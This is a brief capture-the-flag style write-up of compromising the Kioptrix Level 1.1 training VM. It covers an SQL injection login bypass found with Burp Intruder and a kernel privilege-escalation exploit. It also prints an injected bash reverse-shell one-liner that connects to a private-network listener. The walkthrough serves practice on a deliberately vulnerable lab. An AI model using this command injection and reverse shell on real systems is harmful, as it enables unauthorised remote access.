Name: Kioptrix: Level 1.1
Date released: 17 Feb 2010
Initial scan results below
Found a login page running on port 80/Apache
Tried a bunch of normal username combos such as admin:admin admin:password etc.
Tried a couple SQLi attempts in the username and password field but couldn’t get an error message
Decided to use Burp’s Intruder. Tested the uname field against a list of known SQL injection commands.
Inspected the shorter length responses and found that a couple of the SQL injection payloads bypassed authentication.
After doing some initial testing a bash reverse shell looked promising
;bash -i >& /dev/tcp/10.11.1.5/8080 0>&1
low priv shell
Found and executed a Linux Kernel 2.4/2.6 Ring0 Privilege escalation exploit found here
Root!! This was fun and slightly harder than Level 1. On to Level 1.2!